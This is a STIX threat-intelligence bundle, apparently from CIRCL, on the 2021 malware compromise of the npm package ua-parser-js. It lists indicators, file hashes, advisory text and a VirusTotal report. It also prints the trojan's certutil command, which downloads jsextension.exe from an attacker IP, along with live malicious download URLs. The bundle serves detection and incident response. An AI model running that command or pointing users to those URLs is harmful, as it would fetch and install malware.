2023-04-21 14:44:17 +00:00
{
"type" : "bundle" ,
"id" : "bundle--ad7665ec-fef2-44eb-a019-b1b25a8aec05" ,
"objects" : [
{
"type" : "identity" ,
"spec_version" : "2.1" ,
"id" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T08:25:55.000Z" ,
"modified" : "2021-10-24T08:25:55.000Z" ,
"name" : "CIRCL" ,
"identity_class" : "organization"
} ,
{
"type" : "report" ,
"spec_version" : "2.1" ,
"id" : "report--ad7665ec-fef2-44eb-a019-b1b25a8aec05" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T08:25:55.000Z" ,
"modified" : "2021-10-24T08:25:55.000Z" ,
"name" : "Malware Discovered in Popular NPM Package, ua-parser-js" ,
"published" : "2021-10-24T08:26:47Z" ,
"object_refs" : [
"observed-data--e9d82a66-46bd-4f0e-aeac-17349abddeb0" ,
"url--e9d82a66-46bd-4f0e-aeac-17349abddeb0" ,
"observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325" ,
"url--508a294c-876e-4a8a-a3bd-a3de15e10325" ,
"observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542" ,
"url--f51805cb-5fec-4ce1-b7ae-1d1206720542" ,
"indicator--b6541760-d7e6-432b-9715-eae2ce06ad83" ,
"indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972" ,
"indicator--1b1a28a9-2b47-43a3-92b9-c9353497f429" ,
"indicator--9163b990-5b87-413c-a8e7-f616b908157f" ,
"x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c" ,
"x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e" ,
"x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006" ,
"indicator--116cfff2-f422-4b59-a5aa-630fc443be4b" ,
"indicator--e1f2c049-da88-4238-9dde-4134209c1364" ,
"indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd" ,
"indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b" ,
"x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5" ,
2024-04-05 12:15:17 +00:00
"relationship--92180eb6-fd81-4d31-a375-770028b2aac6" ,
"relationship--07baa321-b53c-4eda-aea2-a62c0ba0ad39" ,
"relationship--682b6fb6-76ae-46b5-a911-dc62d19281c1" ,
"relationship--955d9d07-2512-4d9c-b4bb-b6a9af68e605" ,
"relationship--df65813b-b57f-41fb-8dce-eab7a2f86b66" ,
"relationship--a9499e34-20d0-4fe7-a666-c822b1cf5e32" ,
"relationship--38ac5ddc-4453-40fd-930f-e75bb413f44b" ,
"relationship--c178e63a-d9d8-468a-a765-159b8c7fbe88" ,
"relationship--856e3755-e1fe-4032-ae8d-3312f8d4730e" ,
"relationship--e8120512-2ba0-466c-a0fa-f72748e633fa" ,
"relationship--34b8c23a-fd9c-437b-9dfc-81c2d17162d1" ,
"relationship--ac1e3682-9a4a-44b7-aaf0-5ed4f57e9ef0"
2023-04-21 14:44:17 +00:00
] ,
"labels" : [
"Threat-Report" ,
"misp:tool=\"MISP-STIX-Converter\"" ,
"type:OSINT" ,
"osint:lifetime=\"perpetual\"" ,
"osint:certainty=\"50\"" ,
"misp-galaxy:mitre-attack-pattern=\"Compromise Software Supply Chain - T1195.002\"" ,
"misp-galaxy:mitre-attack-pattern=\"Compromise Software Dependencies and Development Tools - T1195.001\""
] ,
"object_marking_refs" : [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--e9d82a66-46bd-4f0e-aeac-17349abddeb0" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T07:52:52.000Z" ,
"modified" : "2021-10-24T07:52:52.000Z" ,
"first_observed" : "2021-10-24T07:52:52Z" ,
"last_observed" : "2021-10-24T07:52:52Z" ,
"number_observed" : 1 ,
"object_refs" : [
"url--e9d82a66-46bd-4f0e-aeac-17349abddeb0"
] ,
"labels" : [
"misp:type=\"link\"" ,
"misp:category=\"External analysis\""
]
} ,
{
"type" : "url" ,
"spec_version" : "2.1" ,
"id" : "url--e9d82a66-46bd-4f0e-aeac-17349abddeb0" ,
"value" : "https://github.com/advisories/GHSA-pjwm-rvh2-c87w"
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T07:54:51.000Z" ,
"modified" : "2021-10-24T07:54:51.000Z" ,
"first_observed" : "2021-10-24T07:54:51Z" ,
"last_observed" : "2021-10-24T07:54:51Z" ,
"number_observed" : 1 ,
"object_refs" : [
"url--508a294c-876e-4a8a-a3bd-a3de15e10325"
] ,
"labels" : [
"misp:type=\"link\"" ,
"misp:category=\"External analysis\""
]
} ,
{
"type" : "url" ,
"spec_version" : "2.1" ,
"id" : "url--508a294c-876e-4a8a-a3bd-a3de15e10325" ,
"value" : "https://github.com/faisalman/ua-parser-js/issues/536"
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T07:58:30.000Z" ,
"modified" : "2021-10-24T07:58:30.000Z" ,
"first_observed" : "2021-10-24T07:58:30Z" ,
"last_observed" : "2021-10-24T07:58:30Z" ,
"number_observed" : 1 ,
"object_refs" : [
"url--f51805cb-5fec-4ce1-b7ae-1d1206720542"
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Payload delivery\""
]
} ,
{
"type" : "url" ,
"spec_version" : "2.1" ,
"id" : "url--f51805cb-5fec-4ce1-b7ae-1d1206720542" ,
"value" : "http://159.148.186.228/download/jsextension.exe"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T07:59:03.000Z" ,
"modified" : "2021-10-24T07:59:03.000Z" ,
"pattern" : "[url:value = 'https://citationsherbe.at/sdd.dll']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2021-10-24T07:59:03Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Payload delivery"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Payload delivery\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T07:59:45.000Z" ,
"modified" : "2021-10-24T07:59:45.000Z" ,
"pattern" : "[domain-name:value = 'citationsherbe.at']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2021-10-24T07:59:45Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"domain\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--1b1a28a9-2b47-43a3-92b9-c9353497f429" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T08:00:44.000Z" ,
"modified" : "2021-10-24T08:00:44.000Z" ,
"description" : "sdd.dll" ,
"pattern" : "[file:hashes.SHA256 = '2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2021-10-24T08:00:44Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Artifacts dropped"
}
] ,
"labels" : [
"misp:type=\"sha256\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--9163b990-5b87-413c-a8e7-f616b908157f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T08:01:14.000Z" ,
"modified" : "2021-10-24T08:01:14.000Z" ,
"description" : "jsextension.exe" ,
"pattern" : "[file:hashes.SHA256 = '47dded0efc230c3536f4db1e2e476afd3eda8d8ea0537db69d432322cdbac9ca']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2021-10-24T08:01:14Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Artifacts dropped"
}
] ,
"labels" : [
"misp:type=\"sha256\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T08:25:55.000Z" ,
"modified" : "2021-10-24T08:25:55.000Z" ,
"labels" : [
"misp:name=\"report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "link" ,
"object_relation" : "link" ,
"value" : "https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js" ,
"category" : "External analysis" ,
"uuid" : "10d9ac50-3208-4cff-9d07-c2bec1c192c8"
} ,
{
"type" : "text" ,
"object_relation" : "summary" ,
"value" : "Versions of a popular NPM package named ua-parser-js was found to contain malicious code. ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. A computer or device with the affected software installed or running could allow a remote attacker to obtain sensitive information or take control of the system. \r\n\r\nCISA urges users and administers using compromised ua-parser-js versions 0.7.29, 0.8.0, and 1.0.0 to update to the respective patched versions: 0.7.30, 0.8.1, 1.0.1 \r\n\r\nFor more information, see Embedded malware in ua-parser-js." ,
"category" : "Other" ,
"uuid" : "5faebe54-7492-4f23-99f8-edf5e24e5424"
} ,
{
"type" : "text" ,
"object_relation" : "type" ,
"value" : "Alert" ,
"category" : "Other" ,
"uuid" : "0e1e4035-31a1-4df6-8aa9-2a6208f7f601"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "report"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T08:23:57.000Z" ,
"modified" : "2021-10-24T08:23:57.000Z" ,
"labels" : [
"misp:name=\"command-line\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "value" ,
"value" : "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe" ,
"category" : "Other" ,
"uuid" : "974258e7-2e79-413c-9be8-08698653b87b"
} ,
{
"type" : "text" ,
"object_relation" : "description" ,
"value" : "The trojan try to execute in the cmd" ,
"category" : "Other" ,
"uuid" : "e3df3b20-a215-40d4-ae1a-a9ed768de240"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "command-line"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T08:11:49.000Z" ,
"modified" : "2021-10-24T08:11:49.000Z" ,
"labels" : [
"misp:name=\"command-line\"" ,
"misp:meta-category=\"misc\"" ,
"cycat:scope=\"detection\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "value" ,
"value" : "npm show ua-parser-js time" ,
"category" : "Other" ,
"uuid" : "4834122d-b43b-4b8d-a9d1-3085611ebaec"
} ,
{
"type" : "text" ,
"object_relation" : "description" ,
"value" : "To check the time when the package was installed" ,
"category" : "Other" ,
"uuid" : "542061ee-8993-44ef-8261-f27f25dc9067"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "command-line"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T08:21:22.000Z" ,
"modified" : "2021-10-24T08:21:22.000Z" ,
"pattern" : "[domain-name:value = 'citationsherbe.at' AND domain-name:resolves_to_refs[*].value = '95.213.165.20']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2021-10-24T08:21:22Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"domain-ip\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--e1f2c049-da88-4238-9dde-4134209c1364" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T08:03:02.000Z" ,
"modified" : "2021-10-24T08:03:02.000Z" ,
"pattern" : "[domain-name:resolves_to_refs[*].value = '159.148.186.228']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2021-10-24T08:03:02Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "network"
}
] ,
"labels" : [
"misp:name=\"domain-ip\"" ,
"misp:meta-category=\"network\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T08:21:44.000Z" ,
"modified" : "2021-10-24T08:21:44.000Z" ,
"description" : "Vulnerable npm package UAParser.js - '0.7.29': '2021-10-22T12:15:21.378Z',\r\n'0.7.30': '2021-10-22T16:16:08.807Z',\r\n\r\n'0.8.0': '2021-10-22T12:16:06.877Z',\r\n'0.8.1': '2021-10-22T16:23:53.062Z',\r\n\r\n'1.0.0': '2021-10-22T12:16:19.726Z',\r\n'1.0.1': '2021-10-22T16:26:19.004Z',\r\n" ,
"pattern" : "[file:x_misp_pattern_in_file = 'ua-parser-js']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2021-10-24T08:21:44Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T08:17:31.000Z" ,
"modified" : "2021-10-24T08:17:31.000Z" ,
"pattern" : "[file:hashes.MD5 = 'de8b54a938ac18f15cad804d79a0e19d' AND file:hashes.SHA1 = 'b6004c62e2d9dbad9cfd5f7e18647ac983788766' AND file:hashes.SHA256 = '2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2021-10-24T08:17:31Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2021-10-24T08:22:57.000Z" ,
"modified" : "2021-10-24T08:22:57.000Z" ,
"labels" : [
"misp:name=\"virustotal-report\"" ,
"misp:meta-category=\"misc\""
] ,
"x_misp_attributes" : [
{
"type" : "datetime" ,
"object_relation" : "last-submission" ,
"value" : "2021-10-24T04:03:55+00:00" ,
"category" : "Other" ,
"comment" : "sdd.dll" ,
"uuid" : "a38e6a9c-1573-4b68-b9ee-dfdda8eb57ed"
} ,
{
"type" : "link" ,
"object_relation" : "permalink" ,
"value" : "https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/detection/f-2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd-1635048235" ,
"category" : "External analysis" ,
"comment" : "sdd.dll" ,
"uuid" : "37fe948f-89f7-4316-bdf3-c88fdbd16b11"
} ,
{
"type" : "text" ,
"object_relation" : "detection-ratio" ,
"value" : "23/50" ,
"category" : "Artifacts dropped" ,
"comment" : "sdd.dll" ,
"uuid" : "b36b2447-2d9b-4993-b23b-2ff46ad63d7c"
}
] ,
"x_misp_meta_category" : "misc" ,
"x_misp_name" : "virustotal-report"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2024-04-05 12:15:17 +00:00
"id" : "relationship--92180eb6-fd81-4d31-a375-770028b2aac6" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-10-24T08:25:55.000Z" ,
"modified" : "2021-10-24T08:25:55.000Z" ,
"relationship_type" : "alerts" ,
"source_ref" : "x-misp-object--30866961-7eda-4bb7-a5e8-cb0bfeebce4c" ,
"target_ref" : "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2024-04-05 12:15:17 +00:00
"id" : "relationship--07baa321-b53c-4eda-aea2-a62c0ba0ad39" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-10-24T08:09:17.000Z" ,
"modified" : "2021-10-24T08:09:17.000Z" ,
"relationship_type" : "is-in-relation-with" ,
"source_ref" : "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e" ,
"target_ref" : "indicator--e1f2c049-da88-4238-9dde-4134209c1364"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2024-04-05 12:15:17 +00:00
"id" : "relationship--682b6fb6-76ae-46b5-a911-dc62d19281c1" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-10-24T08:10:03.000Z" ,
"modified" : "2021-10-24T08:10:03.000Z" ,
"relationship_type" : "downloads" ,
"source_ref" : "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e" ,
"target_ref" : "observed-data--f51805cb-5fec-4ce1-b7ae-1d1206720542"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2024-04-05 12:15:17 +00:00
"id" : "relationship--955d9d07-2512-4d9c-b4bb-b6a9af68e605" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-10-24T08:23:57.000Z" ,
"modified" : "2021-10-24T08:23:57.000Z" ,
"relationship_type" : "related-to" ,
"source_ref" : "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e" ,
"target_ref" : "indicator--9163b990-5b87-413c-a8e7-f616b908157f"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2024-04-05 12:15:17 +00:00
"id" : "relationship--df65813b-b57f-41fb-8dce-eab7a2f86b66" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-10-24T08:11:49.000Z" ,
"modified" : "2021-10-24T08:11:49.000Z" ,
"relationship_type" : "identifies" ,
"source_ref" : "x-misp-object--57d3ed7e-eda9-4e5e-b7ac-a813415e9006" ,
"target_ref" : "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2024-04-05 12:15:17 +00:00
"id" : "relationship--a9499e34-20d0-4fe7-a666-c822b1cf5e32" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-10-24T08:15:51.000Z" ,
"modified" : "2021-10-24T08:15:51.000Z" ,
"relationship_type" : "is-in-relation-with" ,
"source_ref" : "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b" ,
"target_ref" : "indicator--3e4cc221-dbb9-4e64-9523-800d8af8f972"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2024-04-05 12:15:17 +00:00
"id" : "relationship--38ac5ddc-4453-40fd-930f-e75bb413f44b" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-10-24T08:21:22.000Z" ,
"modified" : "2021-10-24T08:21:22.000Z" ,
"relationship_type" : "related-to" ,
"source_ref" : "indicator--116cfff2-f422-4b59-a5aa-630fc443be4b" ,
"target_ref" : "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2024-04-05 12:15:17 +00:00
"id" : "relationship--c178e63a-d9d8-468a-a765-159b8c7fbe88" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-10-24T08:06:58.000Z" ,
"modified" : "2021-10-24T08:06:58.000Z" ,
"relationship_type" : "executes" ,
"source_ref" : "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd" ,
"target_ref" : "x-misp-object--459c41f0-70a7-44ce-b9b0-7f1fc7d2903e"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2024-04-05 12:15:17 +00:00
"id" : "relationship--856e3755-e1fe-4032-ae8d-3312f8d4730e" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-10-24T08:16:24.000Z" ,
"modified" : "2021-10-24T08:16:24.000Z" ,
"relationship_type" : "downloads" ,
"source_ref" : "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd" ,
"target_ref" : "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2024-04-05 12:15:17 +00:00
"id" : "relationship--e8120512-2ba0-466c-a0fa-f72748e633fa" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-10-24T08:21:44.000Z" ,
"modified" : "2021-10-24T08:21:44.000Z" ,
"relationship_type" : "describes" ,
"source_ref" : "indicator--3f6f1f5f-b847-4fd1-be30-6f43601c26cd" ,
"target_ref" : "observed-data--508a294c-876e-4a8a-a3bd-a3de15e10325"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2024-04-05 12:15:17 +00:00
"id" : "relationship--34b8c23a-fd9c-437b-9dfc-81c2d17162d1" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-10-24T08:17:32.000Z" ,
"modified" : "2021-10-24T08:17:32.000Z" ,
"relationship_type" : "analysed-with" ,
"source_ref" : "indicator--bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b" ,
"target_ref" : "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5"
} ,
{
"type" : "relationship" ,
"spec_version" : "2.1" ,
2024-04-05 12:15:17 +00:00
"id" : "relationship--ac1e3682-9a4a-44b7-aaf0-5ed4f57e9ef0" ,
2023-04-21 14:44:17 +00:00
"created" : "2021-10-24T08:22:57.000Z" ,
"modified" : "2021-10-24T08:22:57.000Z" ,
"relationship_type" : "related-to" ,
"source_ref" : "x-misp-object--a9b50a3c-793f-4541-a123-60716668e2d5" ,
"target_ref" : "indicator--b6541760-d7e6-432b-9715-eae2ce06ad83"
} ,
{
"type" : "marking-definition" ,
"spec_version" : "2.1" ,
"id" : "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ,
"created" : "2017-01-20T00:00:00.000Z" ,
"definition_type" : "tlp" ,
"name" : "TLP:WHITE" ,
"definition" : {
"tlp" : "white"
}
}
]
}